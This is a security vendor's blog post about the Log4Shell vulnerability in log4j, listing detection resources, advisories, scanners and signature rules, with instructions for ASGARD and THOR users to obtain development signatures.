The Log4Shell vulnerability (CVE-2021-44228) in log4j is actively exploited in-the-wild and highly critical. This blog posts lists some important web resources and the signatures that detect exploitation attempts.

Explanation of the Vulnerability

LunaSec reported first on the vulnerability.

Canary-based Vulnerability Detection

Use this method to detect vulnerable applications and services in your organisation.

Grep / ZGrep Detection Ideas

Different detection patterns and idea to detect exploitation attempts in log files using grep and zgrep.

Log4Shell Detector Python Script

A python script that can be used to detect even the most obfuscated versions of the malicious payload. 

List of Advisories by Vendors

Big collection of advisories and statements by different vendors that use JAVA and log4j. 

List of Vulnerable Software with PoCs

Incomplete list of software products that have proven to be vulnerable.

Log4Shell Vulnerability Scanner (Local Files)

Scans the file system of application servers for vulnerable versions of the log4j module.

Fenrir Log4Shell Release

A bash based IOC scanner that can be used on any Linux/Unix system to detect traces of the attack and vulnerable log4j versions.

Signatures Detecting Log4Shell Attacks

Check for matches with the following rules:

Exploitation

YARA

Sigma

Post-Exploitation

Look for matches with the following rules that trigger on activity observer in-the-wild.

YARA

Sigma

ASGARD Users

It takes us few days to release new rules. The rules that we wrote over the weekend may not be available on Monday 13th of December. ASGARD users that want to use the signatures that are still in our QS, can activate the option for these signatures in “Settings > Advanced > Show Signature SigDev Option”. 

After changing the setting, new scans show an additional option in the dropdown menu. 

Please contact our support in case of any questions. 

THOR Users

Users of our scanner THOR also need to use the signature version that’s in development to get the newest signatures that detect log4j exploitation. 

Retrieve that signature pack with:

thor-util.exe update –sigdev

WordPress Cookie Plugin by Real Cookie Banner